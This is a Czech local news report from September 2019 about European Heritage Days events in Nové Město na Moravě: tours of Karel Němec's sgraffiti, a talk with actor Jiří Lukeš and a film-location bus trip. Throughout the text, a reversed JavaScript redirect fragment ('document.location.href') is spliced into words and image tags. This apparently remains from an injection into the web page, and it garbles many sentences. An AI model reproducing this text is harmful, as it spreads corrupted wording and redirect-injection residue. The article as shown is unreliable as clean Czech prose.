Rainbow page separator

V Novém Městě o víkendu spojí památky, film i výtvarné počiny

Pátek, 6. září 2019

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / K celoevropskému projektu Dny evropského dědictví se o víkendu 7. a 8. září připojí novoměstská radnice. V Novém Městě akci spojili s Rokem Karla Němce, ale také s filmovým uměním. Na sobotu 7. září jsou přichystány dvě komen[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tované prohlídky – dopolední se zaměří na novoměstského výtvarníka Karla Němce, takže bude možné nahlédnout nejenom do kostela svaté Kunhuty a detailně si prohlédnout sgrafi[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to České nebe. Odpolední prohlídka zájemce provede po výtvarníkových sgrafitech po městě, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to i těch veřejnosti méně známých. Ve 14 hodin se pak odehraje křest lavičky Karla Němce před Horáckým muzeem.[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to-na-morave.jpg“>[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to-na-morave.jpg“ alt=““ width=“200″ height=“299″>
Film se lidem připomene navečer, kdy se od 17 hodin v Horácké galerii uskuteční beseda s Jiřím Lukešem – představitelem filmového Malého Bobše, kterýž[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to snímek se v okolí města bezmála před šesti desítkami let natáčel, i Mirka Dušína. Po celý den budou zdarma taktéž vstupy na výstavy a do expozic novoměstského muzea a galerie.
V neděli 8. září se uskuteční au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tobusový zájezd nazvaný Za památkami a památnými místy okolí aneb Filmové Novoměstsko. Do naplnění kapacity au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tobusu se je možné hlásit v muzeu. Počítá se se zastávkou na Medlově, kde se [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];točilo Otvírání studánek, ve Sněžném si účastníci zájezdu připomenou slavnou éru Hotelu Rýdl a cesta povede i ke sněženské rychtě, která figurovala v Jasného snímku Všichni dobří rodáci. Ve výčtu filmových míst nemůže chybět ani Samotín, nad nímž se natáčely výhledy použité v pohádce Obušku, z pytle ven!